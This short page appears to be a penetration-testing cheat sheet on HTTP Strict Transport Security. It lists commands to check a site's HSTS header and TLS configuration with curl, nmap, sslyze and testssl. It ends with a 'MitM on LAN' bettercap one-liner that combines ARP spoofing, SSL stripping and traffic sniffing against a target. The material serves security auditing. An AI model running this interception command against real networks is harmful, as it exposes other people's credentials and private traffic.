HTTP Strict Transport Security

Check List

curl -s -D- $WEBSITE | grep -i strict

nmap -sS -sV --mtu 5000 --script ssl-enum-ciphers $WEBSITE

sslyze $WEBSITE

testssl $WEBSITE

Interface Network

INTERFACE=$(ip -o -4 addr show | awk '{print $2}' | grep -v "lo" | head -n 1)

MitM on LAN

bettercap -iface $INTERFACE -eval "set arp.spoof.targets $TARGET; arp.spoof on; http.proxy on; http.proxy.sslstrip true; net.sniff on"

Last updated 6 months ago

Was this helpful?